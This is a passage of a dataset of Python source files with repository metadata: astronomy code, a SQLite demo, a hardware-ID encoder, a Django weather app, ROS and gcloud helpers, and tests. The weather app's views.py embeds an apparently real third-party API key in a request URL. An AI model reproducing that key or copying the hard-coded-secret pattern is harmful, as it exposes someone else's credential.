location.longitude, position.rightAscension, position.declination, position.agst)\n \n alt = m.asin( sinAlt ) # Altitude of the Sun above the horizon (rad)\n cosAlt = m.sqrt(1.0 - sinAlt * sinAlt) # Cosine of the altitude is always positive or zero\n \n # Correct for parallax:\n alt -= 4.2635e-5 * cosAlt # Horizontal parallax = 8.794\" = 4.2635e-5 rad\n position.altitude = alt\n \n # Correct for atmospheric refraction:\n dalt = 2.967e-4 / m.tan(alt + 3.1376e-3/(alt + 8.92e-2)) # Refraction correction in altitude\n dalt *= location.pressure/101.0 * 283.0/location.temperature\n alt += dalt\n # to do: add pressure/temperature dependence\n position.altitudeRefract = alt\n \n return\n\n\ndef eq2horiz(sinLat, cosLat, longitude, rightAscension, declination, agst):\n \"\"\"Convert equatorial coordinates to horizontal coordinates.\n \n Parameters:\n sinLat (float): Sine of the geographic latitude of the observer.\n cosLat (float): Cosine of the geographic latitude of the observer.\n longitude (float): Geographic longitude of the observer (rad).\n rightAscension (float): Right ascension of the Sun (rad).\n declination (float): Declination of the Sun (rad).\n agst (float): Apparent Greenwich sidereal time (Greenwich mean sidereal time, corrected for the equation of the equinoxes).\n \n Returns: \n tuple (float,float): Tuple containing (azimuth, sinAlt):\n \n - azimuth (float): Azimuth (\"wind direction\") of the Sun (rad; 0=South).\n - sinAlt (float): Sine of the altitude of the Sun above the horizon.\n \n \"\"\"\n \n ha = agst + longitude - rightAscension # Local Hour Angle\n \n # Some preparation, saves ~29%:\n sinHa = m.sin(ha)\n cosHa = m.cos(ha)\n \n sinDec = m.sin(declination)\n cosDec = m.sqrt(1.0 - sinDec * sinDec) # Cosine of a declination is always positive or zero\n tanDec = sinDec/cosDec\n \n azimuth = m.atan2( sinHa, cosHa * sinLat - tanDec * cosLat ) # 0 <= azimuth < 2pi\n sinAlt = sinLat * sinDec + cosLat * cosDec * cosHa # Sine of the altitude above the horizon\n \n return azimuth, sinAlt\n\n\ndef convertHorizontalToEquatorial(sinLat, cosLat, azimuth, altitude):\n \n \"\"\"Convert (refraction-corrected) horizontal coordinates to equatorial coordinates.\n \n Parameters:\n sinLat (float): Sine of the geographic latitude of the observer.\n cosLat (float): Cosine of the geographic latitude of the observer.\n azimuth (float): Azimuth (\"wind direction\") of the Sun (rad; 0=South).\n altitude (float): Altitude of the Sun above the horizon (rad).\n \n Returns: \n tuple (float,float): Tuple containing (hourAngle, declination):\n \n - hourAngle (float): Hour angle of the Sun (rad; 0=South).\n - declination (float): Declination of the Sun (rad).\n \n \"\"\"\n \n # Multiply used variables:\n cosAz = m.cos(azimuth)\n sinAz = m.sin(azimuth) # For symmetry\n \n sinAlt = m.sin(altitude)\n cosAlt = m.sqrt(1.0 - sinAlt * sinAlt) # Cosine of an altitude is always positive or zero\n tanAlt = sinAlt/cosAlt\n \n hourAngle = m.atan2( sinAz, cosAz * sinLat + tanAlt * cosLat ) # Local Hour Angle: 0 <= hourAngle < 2pi\n declination = m.asin( sinLat * sinAlt - cosLat * cosAlt * cosAz ) # Declination\n \n return hourAngle, declination\n\n\n\ndef setNorthToZero(azimuth, hourAngle, computeRefrEquatorial):\n \"\"\"Convert the South=0 convention to North=0 convention for azimuth and hour angle.\n \n Note:\n - South=0 is the default in celestial astronomy.\n - This function makes the angles compatible with the compass/wind directions.\n \n Parameters:\n azimuth (float): Azimuth (\"wind direction\") of the Sun (rad).\n hourAngle (float): Hour angle of the Sun (rad).\n computeRefrEquatorial (bool): Compute refraction correction for equatorial coordinates.\n \n Returns: \n tuple (float,float): Tuple containing (azimuth, hourAngle):\n \n - azimuth (float): Azimuth (\"wind direction\") of the Sun (rad).\n - hourAngle (float): Hour angle of the Sun (rad; 0=South).\n \n \"\"\"\n \n azimuth = (azimuth + PI) % TWO_PI # Add PI to set North=0\n \n if(computeRefrEquatorial):\n hourAngle = (hourAngle + PI) % TWO_PI # Add PI to set North=0\n \n return azimuth, hourAngle\n\n\ndef convertRadiansToDegrees(position, computeRefrEquatorial):\n \"\"\"Convert final results from radians to degrees.\n \n Note:\n - Does not touch intermediate results.\n \n position (Position): Dataclass containing Sun position (I/O).\n computeRefrEquatorial (bool): Compute refraction correction for equatorial coordinates.\n \n \"\"\"\n \n \n position.longitude *= R2D\n position.rightAscension *= R2D\n position.declination *= R2D\n \n position.altitude *= R2D\n position.azimuthRefract *= R2D\n position.altitudeRefract *= R2D\n \n if(computeRefrEquatorial):\n position.hourAngleRefract *= R2D\n position.declinationRefract *= R2D\n \n return\n\n","repo_name":"astronomy/SolTrack","sub_path":"Python/soltrack/soltrack.py","file_name":"soltrack.py","file_ext":"py","file_size_in_byte":15013,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"7"} +{"seq_id":"29354621539","text":"import sqlite3\n\n# link to SQLite database namded mrsoft.db\nconn = sqlite3.connect('mrsoft.db')\n# create a cursor object\ncursor = conn.cursor()\n# execute a SQL statement to create a user table\ntry:\n cursor.execute('create table user (id int(10) primary key, name varchar(20))')\nexcept:\n print('user table has been created')\n\n# add user data\ncursor.execute('insert into user (id,name) values (\"1\",\"ethan\")')\n# view user data\ncursor.execute('select * from user')\nresult1 = cursor.fetchone()\nprint(result1)\n# update user data\ncursor.execute('update user set name =? where id=?',('xieruifeng',1))\ncursor.execute('select * from user')\nresult1 = cursor.fetchone()\nprint(result1)\n# delete user data\ncursor.execute('delete from user where id=?',(1,))\ncursor.execute('select * from user')\nresult1 = cursor.fetchone()\nprint(result1)\n# close cursor\ncursor.close()\n# commit work\nconn.commit()\n# close connection\nconn.close()\n","repo_name":"xerifg/py_project_demo","sub_path":"Database/SQLite_test.py","file_name":"SQLite_test.py","file_ext":"py","file_size_in_byte":918,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"71935467743","text":"from cros.factory.hwid.v3 import common\nfrom cros.factory.test import device_data_constants\n\n\nclass ConfiglessFields:\n \"\"\"ConfiglessFields class\n\n The format of configless fields is decided by FIELDS:\n\n `hex()-hex()-...-hex()`\n\n And the content of feature list field is decided by FEATURE_LIST[version]\n where version is FIELDS[0]. To make it easier to extend (that is, add\n 'has_new_feature' to the end of existing FEATURE_LIST[version]), always add\n a leading 1, so we can determine the length of feature list when it was\n encoded.\n\n For example,\n\n FIELDS = [\n 'version',\n 'memory',\n 'storage',\n 'feature_list'\n ]\n\n FEATURE_LIST = {\n 0: [\n 'has_touchscreen',\n 'has_touchpad',\n 'has_stylus',\n 'has_front_camera',\n 'has_rear_camera',\n 'has_fingerprint',\n 'is_convertible',\n 'is_rma_device'\n ]\n }\n\n encoded string \"0-8-74-180\" represents version 0, 8G memory, 116G storage and\n has touchscreen('180' is 0b110000000).\n\n If we extend version 0,\n\n FEATURE_LIST = {\n 0: [\n 'has_touchscreen',\n 'has_touchpad',\n 'has_stylus',\n 'has_front_camera',\n 'has_rear_camera',\n 'has_fingerprint',\n 'is_convertible',\n 'is_rma_device',\n 'has_new_feature',\n ]\n }\n\n then, feature list field '180' means has touchscreen and don't have value for\n 'has_new_feature'.\n \"\"\"\n\n FIELDS = [\n 'version', # version of feature list\n 'memory',\n 'storage',\n 'feature_list'\n ]\n\n FEATURE_LIST = {\n 0: [\n 'has_touchscreen',\n 'has_touchpad',\n 'has_stylus',\n 'has_front_camera',\n 'has_rear_camera',\n 'has_fingerprint',\n 'is_convertible',\n 'is_rma_device'\n ]\n }\n\n\n @classmethod\n def Encode(cls, db, bom, device_info, version, is_rma_device):\n \"\"\"Return a encoded string according to version.\n\n Args:\n db: a Database object that is used to provide device-specific\n information.\n :type database: cros.factory.hwid.v3.database.Database\n\n bom: a BOM object that lists components on current device.\n :type bom: cros.factory.hwid.v3.bom.BOM\n\n device_info: a dictionary follows definition in `device_data`.\n :type device_info: dict\n\n version: use _FeatureList_{version} to encode/decode feature list field.\n :type version: int\n\n Returns:\n A string of encoded configless fields.\n \"\"\"\n getter = _ConfiglessFieldGetter(\n db, bom, device_info, version, is_rma_device)\n return '-'.join(\n hex(getter(field)).upper().replace('0X', '') for field in cls.FIELDS)\n\n @classmethod\n def Decode(cls, encoded_string):\n \"\"\"Return a dict of decoded info.\n\n Args:\n encoded_string: a string generated by ConfiglessFields.Encode\n :type encoded_string: string\n\n Returns:\n A decoded dict.\n For example, a return dict\n {\n 'version': 0,\n 'memory': 8,\n 'storage' 116,\n 'feature_list': {\n 'has_touchscreen': 1,\n 'has_touchpad': 0,\n 'has_stylus': 0,\n 'has_front_camera': 0,\n 'has_rear_camera': 0,\n 'has_fingerprint': 0,\n 'is_convertible': 0,\n 'is_rma_device': 0,\n }\n }\n means configless fileds version 0, 8G memory, 116G storage and has\n touchscreen.\n \"\"\"\n decoder = _ConfiglessFieldDecoder(encoded_string)\n fields = {\n field: decoder(field)\n for field in cls.FIELDS\n }\n return fields\n\n\nclass FeatureList:\n \"\"\"Encode/Decode feature list according to ConfiglessFields.FeatureList\"\"\"\n def __init__(self, version):\n self.features = ConfiglessFields.FEATURE_LIST[version]\n\n def Encode(self, components):\n encoded_value = 1\n for feature in self.features:\n encoded_value <<= 1\n encoded_value |= components.get(feature, 0)\n return encoded_value\n\n def Decode(self, encoded_value):\n feature_count = len(self.features)\n if encoded_value >= 2 ** (feature_count + 1):\n raise common.HWIDException(\n 'The given configless fields is invalid. The last field should be a '\n 'hex value in [0, %s].' %\n hex(2 ** (feature_count + 1) - 1).upper().replace('0X', ''))\n\n bin_string = bin(encoded_value).replace('0b', '')[1:]\n result = {\n self.features[i]: int(bin_string[i])\n for i in range(len(bin_string))\n }\n return result\n\n\nclass _ConfiglessFieldGetter:\n \"\"\"Extract value of from BOM / device_info for configless fields.\"\"\"\n def __init__(self, db, bom, device_info, version, is_rma_device):\n self._db = db\n self._bom = bom\n self._device_info = device_info or {}\n self._version = version\n self._is_rma_device = is_rma_device\n self._feature_list = FeatureList(version)\n\n def __call__(self, field_name):\n \"\"\"Get value of a field.\"\"\"\n return getattr(self, field_name)\n\n @property\n def memory(self):\n if self.is_rma_device and 'dram' not in self._bom.components:\n # We might be generating HWID for RMA spare boards, real DRAM info might\n # not be available until the spare board is mounted on device. So it's\n # okay to omit this field.\n return 0\n size_mb = sum(int(self._db.GetComponents('dram')[comp].values['size'])\n for comp in self._bom.components['dram'])\n return size_mb // 1024\n\n @property\n def storage(self):\n if self.is_rma_device and 'storage' not in self._bom.components:\n # We might be generating HWID for RMA spare boards, real storage info\n # might not be available until the spare board is mounted on device. So\n # it's okay to omit this field.\n return 0\n sectors = sum(int(self._db.GetComponents('storage')[comp].values['sectors'])\n for comp in self._bom.components['storage'])\n # Assume sector size is 512 bytes\n return sectors // 2 // 1024 // 1024\n\n @property\n def version(self):\n return self._version\n\n @property\n def is_rma_device(self):\n return self._is_rma_device\n\n @property\n def feature_list(self):\n \"\"\"Get feature list encoded string.\"\"\"\n components = self._device_info.get(device_data_constants.KEY_COMPONENT, {})\n # Set is_rma_device.\n components['is_rma_device'] = self._is_rma_device\n return self._feature_list.Encode(components)\n\n\nclass _ConfiglessFieldDecoder:\n \"\"\"Extract value of encoded string for configless fields.\"\"\"\n def __init__(self, encoded_string):\n encoded_fields = [int(field, 16) for field in encoded_string.split('-')]\n if len(encoded_fields) != len(ConfiglessFields.FIELDS):\n raise common.HWIDException(\n 'The given configless fields %r is invalid. It must have %r fields.' %\n (encoded_string, len(ConfiglessFields.FIELDS)))\n\n self._encoded_fields = dict(zip(ConfiglessFields.FIELDS, encoded_fields))\n self._feature_list = FeatureList(self._encoded_fields['version'])\n\n def __call__(self, field_name):\n \"\"\"Get decoded value of a field.\n\n By default, convert encoded hex string to integer.\n To override the behavior, create a property of field name\n (e.g. `feature_list`).\n \"\"\"\n try:\n return getattr(self, field_name)\n except Exception:\n return self._encoded_fields[field_name]\n\n @property\n def feature_list(self):\n \"\"\"Construct the dict of feature list\"\"\"\n return self._feature_list.Decode(self._encoded_fields['feature_list'])\n","repo_name":"arccode/factory","sub_path":"py/hwid/v3/configless_fields.py","file_name":"configless_fields.py","file_ext":"py","file_size_in_byte":7568,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"7"} +{"seq_id":"2728710924","text":"from django.shortcuts import render, redirect, get_object_or_404\nfrom django.contrib.auth.forms import UserCreationForm, AuthenticationForm\nfrom django.contrib.auth.models import User\nfrom django.db import IntegrityError\nfrom django.contrib.auth import login, logout, authenticate\nfrom .forms import TodoForm\nfrom .models import Todo\nfrom django.utils import timezone\nfrom django.contrib.auth.decorators import login_required\nfrom django.http import JsonResponse\nimport requests\nimport json\nimport datetime\n\ndef home(request):\n return render(request, 'Weather/home.html')\n\n\n\n# Create your views here.\ndef signupuser(request):\n if request.method == 'GET':\n return render(request, 'Weather/signupuser.html', {'form':UserCreationForm()})\n else:\n if request.POST['password1'] == request.POST['password2']:\n try:\n user = User.objects.create_user(request.POST['username'], password=request.POST['password1'])\n user.save()\n login(request, user)\n return redirect('currenttodos')\n except IntegrityError:\n return render(request, 'Weather/signupuser.html',{'form': UserCreationForm(), 'error': 'Bu kullanıcı sisteme zaten kayıtlı'})\n else:\n return render(request, 'Weather/signupuser.html', {'form':UserCreationForm(), 'error':'Girilen Şifreler Uyuşmuyor'})\n\ndef loginuser(request):\n if request.method == 'GET':\n return render(request, 'Weather/loginuser.html', {'form': AuthenticationForm()})\n else:\n user = authenticate(request, username=request.POST['username'], password=request.POST['password'])\n if user is None:\n return render(request, 'Weather/loginuser.html', {'form': AuthenticationForm(), 'error': 'Kullanıcı Adı veya Şifre Hatalı'})\n else:\n login(request, user)\n return redirect('currenttodos')\n@login_required\ndef logoutuser(request):\n if request.method == 'POST':\n logout(request)\n return redirect('home')\n\n@login_required\ndef createtodo(request):\n if request.method == 'GET':\n\n return render(request, 'Weather/createtodo.html', {'form': TodoForm()})\n else:\n form = TodoForm(request.POST)\n global result\n global newtodo\n country = request.POST['title']\n numOfDays = request.POST['numDay']\n result = requests.get('http://api.worldweatheronline.com/premium/v1/weather.ashx?key=1e99431f9e6f443d90c123259202011&q='+country+'&format=json&num_of_days='+str(numOfDays))\n json_data = json.loads(result.text)\n request.session['myData'] = json_data\n request.session['dayN'] = numOfDays\n #newtodo = form.save(commit=False)\n #newtodo.memo = numOfDays\n #newtodo.user = request.user\n #newtodo.memo = json_data[\"data\"][\"weather\"][3][\"maxtempC\"]\n\n #newtodo.save()\n return redirect('currenttodos')\n #return JsonResponse({'Weather': json_data})\n #return render(request, 'Weather/currenttodos.html', {'title': result})\n\n@login_required\ndef currenttodos(request):\n try:\n jsonData = request.session['myData']\n numOfDays = request.session['dayN']\n test = \"Ankarada Ortalama Sıcaklık :\"+jsonData[\"data\"][\"weather\"][0][\"avgtempC\"]+\" Derece\"\n CurrentTemp = jsonData[\"data\"][\"current_condition\"][0][\"temp_C\"]\n CityName = jsonData[\"data\"][\"request\"][0][\"query\"]\n humidtyC = jsonData[\"data\"][\"current_condition\"][0][\"humidity\"]\n Date = []\n avgTemp = []\n FeelsLikeC = jsonData[\"data\"][\"current_condition\"][0][\"FeelsLikeC\"]\n Weather=jsonData[\"data\"][\"current_condition\"][0][\"weatherDesc\"][0][\"value\"]\n WeatherAvg= []\n Icon=jsonData[\"data\"][\"current_condition\"][0][\"weatherIconUrl\"][0][\"value\"]\n timeW = []\n nextDates = []\n Day = datetime.datetime.now()\n DayList = []\n #Clock = datetime.datetime.now().strftime(\"%H:%M:%S\")\n maxTemp = []\n minTemp=[]\n sunrise=[]\n sunset = []\n sunHour =[]\n weatherDesc=[]\n for i in range(8): # Saatlik Hava\n timeW.append(jsonData[\"data\"][\"weather\"][0][\"hourly\"][i][\"tempC\"])\n\n if numOfDays == \"5\":\n for i in range(5):\n Date.append(jsonData[\"data\"][\"weather\"][i][\"date\"])\n avgTemp.append(jsonData[\"data\"][\"weather\"][i][\"avgtempC\"])\n maxTemp.append(jsonData[\"data\"][\"weather\"][i][\"maxtempC\"])\n minTemp.append(jsonData[\"data\"][\"weather\"][i][\"mintempC\"])\n sunrise.append(jsonData[\"data\"][\"weather\"][i][\"astronomy\"][0][\"sunrise\"])\n sunset.append(jsonData[\"data\"][\"weather\"][i][\"astronomy\"][0][\"sunset\"])\n sunHour.append(jsonData[\"data\"][\"weather\"][i][\"sunHour\"])\n WeatherAvg.append(jsonData[\"data\"][\"weather\"][i][\"hourly\"][4][\"weatherIconUrl\"][0][\"value\"])\n weatherDesc.append(jsonData[\"data\"][\"weather\"][i][\"hourly\"][4][\"weatherDesc\"][0][\"value\"])\n DayList.append(Day.strftime(\"%A\"))\n Day += datetime.timedelta(days=1)\n else:\n for i in range(3):\n Date.append(jsonData[\"data\"][\"weather\"][i][\"date\"])\n avgTemp.append(jsonData[\"data\"][\"weather\"][i][\"avgtempC\"])\n maxTemp.append(jsonData[\"data\"][\"weather\"][i][\"maxtempC\"])\n minTemp.append(jsonData[\"data\"][\"weather\"][i][\"mintempC\"])\n sunrise.append(jsonData[\"data\"][\"weather\"][i][\"astronomy\"][0][\"sunrise\"])\n sunset.append(jsonData[\"data\"][\"weather\"][i][\"astronomy\"][0][\"sunset\"])\n sunHour.append(jsonData[\"data\"][\"weather\"][i][\"sunHour\"])\n WeatherAvg.append(jsonData[\"data\"][\"weather\"][i][\"hourly\"][4][\"weatherIconUrl\"][0][\"value\"])\n weatherDesc.append(jsonData[\"data\"][\"weather\"][i][\"hourly\"][4][\"weatherDesc\"][0][\"value\"])\n DayList.append(Day.strftime(\"%A\"))\n Day += datetime.timedelta(days=1)\n\n\n\n\n\n if request.method == 'GET':\n return render(request, 'Weather/currenttodos.html', {'test': test, 'CurrentTemp': CurrentTemp, 'CityName': CityName, 'DayList' : DayList, 'Date': Date, 'Weather': Weather, 'Icon': Icon, 'timeW': timeW, 'numOfDays':numOfDays, 'avgTemp':avgTemp, 'humidtyC': humidtyC, 'FeelsLikeC':FeelsLikeC, 'WeatherAvg':WeatherAvg, 'minTemp':minTemp, 'maxTemp':maxTemp, 'sunrise':sunrise,'sunset':sunset, 'sunHour':sunHour,'weatherDesc':weatherDesc})\n except:\n return redirect('createtodo')\n\n","repo_name":"cankatcanbul/Barikat","sub_path":"HavaDurumu/Weather/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6597,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"35451444520","text":"#!/usr/bin/env python3\n\n\nimport roslaunch\nimport rospy\nimport os\n\nhome_path = os.environ['HOME']\nrospy.init_node('launch_demo_world', anonymous=True)\n#---------------------REAL ENV-------------------------\n\nuuid = roslaunch.rlutil.get_or_generate_uuid(None, False)\nroslaunch.configure_logging(uuid)\nlaunch = roslaunch.parent.ROSLaunchParent(uuid, [home_path + '/5755_ws/src/team-park/park_demo/park_demo/launch/camera.launch'])\nlaunch.start()\nrospy.loginfo(\"started Realsense Node\")\nrospy.sleep(10)\nrospy.sleep(36000) #10 hours later......\n","repo_name":"mfkenson/MAEG5755-2021-Team-PARK","sub_path":"park_demo/park_demo/scripts/launcher/launch_demo_real.py","file_name":"launch_demo_real.py","file_ext":"py","file_size_in_byte":540,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"7"} +{"seq_id":"10726309572","text":"from pprint import pprint\n\nwith open(\"7-input.txt\") as fin:\n data = fin.read()\n\ntree = {}\n\nrule = \"clear tomato bags contain 4 dotted magenta bags, 1 dull chartreuse bag, 2 dim aqua bags, 1 dull brown bag.\"\n\ndef add_parents(rule):\n split = rule.split(\" \")\n parent = \" \".join(split[:split.index(\"contain\") - 1])\n\n if not parent in tree:\n tree[parent] = set()\n\n childList = \" \".join(split[split.index(\"contain\") + 1:]).split(\", \")\n for cString in childList:\n if cString == \"no other bags.\":\n continue\n\n parts = cString.split(\" \")\n amount = int(parts[0])\n bagName = \" \".join(parts[1:-1])\n tree[parent].add((amount, bagName))\n\n\nrules = data.split(\"\\n\")\nfor r in rules:\n add_parents(r)\n\nanswer = 0\ndfs = [(1, \"shiny gold\")]\nseen = set()\n\nwhile len(dfs) > 0:\n amount, color = dfs.pop()\n answer += amount\n\n #seen.add(pop)\n \n if color in tree:\n children = tree[color]\n for n, child in children:\n dfs.append((n * amount, child))\n\n\nprint(answer - 1)","repo_name":"womogenes/AoC-2020-solutions","sub_path":"07/7.2.py","file_name":"7.2.py","file_ext":"py","file_size_in_byte":1053,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"7"} +{"seq_id":"35729967264","text":"from ast import Pass\nfrom django.db.models import Sum\nfrom django.contrib import admin\nfrom . import models\n# Register your models here.\n@admin.register(models.Assign)\nclass AdminAssign(admin.ModelAdmin):\n list_display=[\n 'sandogh_khayerieh',\n 'khayer_full_name',\n 'tahvilgirandeh',\n 'date'\n ]\n def khayer_full_name(self,assign:models.Assign):\n return assign.sandogh_khayerieh.khayer.last_name+' '+assign.sandogh_khayerieh.khayer.first_name\n \n list_select_related=[\n 'sandogh_khayerieh',\n 'tahvilgirandeh',\n ]\n list_filter=[\n 'sandogh_khayerieh',\n 'tahvilgirandeh',\n 'date'\n \n \n ]\n search_fields=[\n 'sandogh_khayerieh__khayer__first_name',\n 'sandogh_khayerieh__khayer__last_name',\n 'sandogh_khayerieh__code',\n 'tahvilgirandeh__first_name',\n 'tahvilgirandeh__last_name',\n ]\n \n@admin.register(models.Payment)\nclass AdminPayment(admin.ModelAdmin):\n list_display=['pk',\n 'khayer',\n 'sandogh_khayerieh',\n 'tahvilgirandeh_sandogh',\n 'amount',\n 'date'\n ]\n search_fields=['pk',\n 'khayer__first_name',\n 'khayer__last_name',\n 'sandogh_khayerieh__code',\n 'tahvilgirandeh_sandogh__first_name',\n 'tahvilgirandeh_sandogh__last_name',\n 'amount',\n ]\n #list_editable=['date']\n list_filter=[\n 'id',\n 'date',\n 'khayer',\n 'sandogh_khayerieh',\n 'tahvilgirandeh_sandogh',\n ]\n ordering=['date']\n list_per_page=15\n\n@admin.register(models.Khayer)\nclass AdminKhayer(admin.ModelAdmin):\n list_display=['pk',\n 'last_name',\n 'first_name',\n 'phone_number',\n 'sum_of_helps',\n 'creating_date'\n ]\n search_fields=[\n 'pk',\n 'last_name',\n 'first_name',\n 'phone_number',\n ]\n #list_editable=['first_name']\n #ordering=['']\n list_per_page=15\n\n def sum_of_helps(self,khayer):\n return khayer.sum_of_helps2\n def get_queryset(self, request):\n return super().get_queryset(request).annotate(\n sum_of_helps2=Sum('payment__amount')\n )\n \n@admin.register(models.HesabMoaseseh)\nclass AdminHesabMoaseseh(admin.ModelAdmin):\n list_display=['name',\n 'account_number',\n 'cart_number',\n 'sum_of_balance'\n ]\n search_fields=['name']\n def sum_of_balance(self,hesab_moaseseh):\n if hesab_moaseseh.Pay != None and hesab_moaseseh.Recive !=None:\n return hesab_moaseseh.Recive -hesab_moaseseh.Pay\n if hesab_moaseseh.Pay == None:\n return (-1)*hesab_moaseseh.Recive\n return hesab_moaseseh.Pay\n def get_queryset(self, request):\n return super().get_queryset(request).annotate(\n \n Recive=Sum('payment__amount'),\n Pay=Sum('helping__amount')\n \n )\n \n #list_editable=['']\n #ordering=['']\n list_per_page=15\n \n\n@admin.register(models.Madadjo)\nclass AdminMadadjo(admin.ModelAdmin):\n list_display=['first_name',\n 'last_name',\n 'status',\n 'sum_of_helped_recived',\n 'creating_date'\n ]\n search_fields=[\n 'pk',\n 'last_name',\n 'first_name',\n 'phone_number',\n 'status',\n ]\n #list_editable=['']\n #ordering=['']\n list_per_page=15\n def sum_of_helped_recived(self,madadjo):\n return madadjo.sum\n def get_queryset(self, request):# set fillter for save or pay\n\n return super().get_queryset(request).annotate(\n sum=Sum('helping__amount')\n )\n \n #list_editable=['']\n #ordering=['']\n list_per_page=15\n \n\n@admin.register(models.TahvilgirandehSandogh)\nclass AdminTahvilgirandehSandogh(admin.ModelAdmin):\n list_display=['first_name',\n 'last_name',\n 'phone_number'\n ]\n search_fields=['first_name',\n 'last_name',\n 'phone_number'\n ]\n #list_editable=['']\n #ordering=['']\n list_per_page=15\n\n@admin.register(models.SandoghKhayerieh)\nclass AdminSandoghKhayerieh(admin.ModelAdmin):\n list_display=['pk',\n 'khayer'\n ]\n search_fields=[\n 'pk',\n 'khayer__first_name',\n 'khayer__last_name',\n ]\n #list_editable=['']\n #ordering=['']\n list_per_page=15\n\n@admin.register(models.Helping)\nclass AdminHelping(admin.ModelAdmin):\n list_display=['madadjo',\n 'hesab_moaseseh',\n 'amount',\n 'date'\n ]\n \n search_fields=['madadjo__first_name',\n 'madadjo__last_name',\n 'hesab_moaseseh__name',\n 'amount',\n 'date'\n ]\n #list_editable=['']\n \n ordering=['date']\n list_per_page=15\n\n","repo_name":"shahab2021/BaranRahmatCharity","sub_path":"project/management/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":5312,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"27760723819","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import unicode_literals\n\nfrom googlecloudsdk.api_lib.accesscontextmanager import util\nfrom googlecloudsdk.api_lib.util import waiter\n\nfrom googlecloudsdk.core import resources\n\n\nclass Client(object):\n\n def __init__(self, client=None, messages=None, version=None):\n self.client = client or util.GetClient(version=version)\n self.messages = messages or self.client.MESSAGES_MODULE\n\n def Patch(self,\n level_ref,\n description=None,\n title=None,\n basic_level_combine_function=None,\n basic_level_conditions=None,\n custom_level_expr=None):\n \"\"\"Patch an access level.\n\n Args:\n level_ref: resources.Resource, reference to the level to patch\n description: str, description of the level or None if not updating\n title: str, title of the level or None if not updating\n basic_level_combine_function: ZoneTypeValueValuesEnum, combine function\n enum value of the level or None if not updating\n basic_level_conditions: list of Condition, the conditions for a basic\n level or None if not updating\n custom_level_expr: the expression of the Custom level, or none if not\n updating.\n\n Returns:\n AccessLevel, the updated access level\n \"\"\"\n level = self.messages.AccessLevel()\n update_mask = []\n if description is not None:\n update_mask.append('description')\n level.description = description\n if title is not None:\n update_mask.append('title')\n level.title = title\n if basic_level_combine_function is not None:\n update_mask.append('basic.combiningFunction')\n level.basic = level.basic or self.messages.BasicLevel()\n level.basic.combiningFunction = basic_level_combine_function\n if basic_level_conditions is not None:\n update_mask.append('basic.conditions')\n level.basic = level.basic or self.messages.BasicLevel()\n level.basic.conditions = basic_level_conditions\n if custom_level_expr is not None:\n update_mask.append('custom')\n level.custom = level.custom or self.messages.CustomLevel()\n level.custom.expr = custom_level_expr\n update_mask.sort() # For ease-of-testing\n\n m = self.messages\n request_type = m.AccesscontextmanagerAccessPoliciesAccessLevelsPatchRequest\n request = request_type(\n accessLevel=level,\n name=level_ref.RelativeName(),\n updateMask=','.join(update_mask),\n )\n operation = self.client.accessPolicies_accessLevels.Patch(request)\n\n poller = util.OperationPoller(self.client.accessPolicies_accessLevels,\n self.client.operations, level_ref)\n operation_ref = resources.REGISTRY.Parse(\n operation.name, collection='accesscontextmanager.operations')\n return waiter.WaitFor(\n poller, operation_ref,\n 'Waiting for PATCH operation [{}]'.format(operation_ref.Name()))\n","repo_name":"twistedpair/google-cloud-sdk","sub_path":"google-cloud-sdk/lib/googlecloudsdk/api_lib/accesscontextmanager/levels.py","file_name":"levels.py","file_ext":"py","file_size_in_byte":2972,"program_lang":"python","lang":"en","doc_type":"code","stars":55,"dataset":"github-code","pt":"7"} +{"seq_id":"36513158074","text":"import pytest\n\nfrom server.service.error.type.consistency_error import ConsistencyError\nfrom server.service.strategy.base import BaseStrategy\n\ndefault_pick_list = [\"1\", \"2\", \"3\", \"4\", \"5\", \"6\"]\n\n\ndef test_base_create_weight_list():\n assert BaseStrategy.create_weight_list(3) == [1 / 3, 1 / 3, 1 / 3]\n\n\ndef test_base_strategy_creation():\n weight_list = [1 / 3, 2 / 3]\n strategy = BaseStrategy(\n pick_list=default_pick_list[: len(weight_list)], weight_list=weight_list\n )\n assert strategy.weight_list == weight_list\n\n\ndef test_base_strategy_creation_round_sum():\n weight_list = [0.999999999999]\n try:\n BaseStrategy(\n pick_list=default_pick_list[: len(weight_list)], weight_list=weight_list\n )\n except Exception:\n pytest.fail(\"Should not fail even if the weight list is not exactly 1\")\n\n\n@pytest.mark.parametrize(\n \"pick_list, weight_list, error_message\",\n [\n ([], [1], \"Can't pick an item from an empty pick list.\"),\n (default_pick_list, [], \"Weight list must not be empty.\"),\n (\n default_pick_list,\n [1],\n \"Pick list and weight list muse have the same length.\",\n ),\n (default_pick_list[:2], [1, 2], \"Weight list must sum up to 1.\"),\n ],\n)\ndef test_base_strategy_creation_error(pick_list, weight_list, error_message):\n with pytest.raises(ConsistencyError, match=error_message):\n BaseStrategy(pick_list=pick_list, weight_list=weight_list)\n\n\n@pytest.mark.parametrize(\n \"items_to_add, value, expected_weight_list\",\n [\n ([], None, [1 / 3, 2 / 3]),\n ([\"c\"], None, [2 / 9, 4 / 9, 3 / 9]),\n ([\"c\"], 1, [1 / 6, 1 / 3, 1 / 2]),\n ([\"c\"], 0, [1 / 3, 2 / 3, 0]),\n ([\"c\", \"d\"], None, [2 / 12, 4 / 12, 3 / 12, 3 / 12]),\n ],\n)\ndef test_base_strategy_add_items(items_to_add, value, expected_weight_list):\n weight_list = [1 / 3, 2 / 3]\n strategy = BaseStrategy(\n pick_list=default_pick_list[: len(weight_list)], weight_list=weight_list\n )\n strategy.add_items(items_to_add, value)\n assert strategy.pick_list == default_pick_list[: len(weight_list)] + items_to_add\n assert [round(el, 6) for el in strategy.weight_list] == [\n round(el, 6) for el in expected_weight_list\n ]\n\n\n@pytest.mark.parametrize(\n \"items_indices, expected_pick_list, expected_weight_list\",\n [\n ([], default_pick_list[:3], [1 / 6, 2 / 6, 3 / 6]),\n ([0], 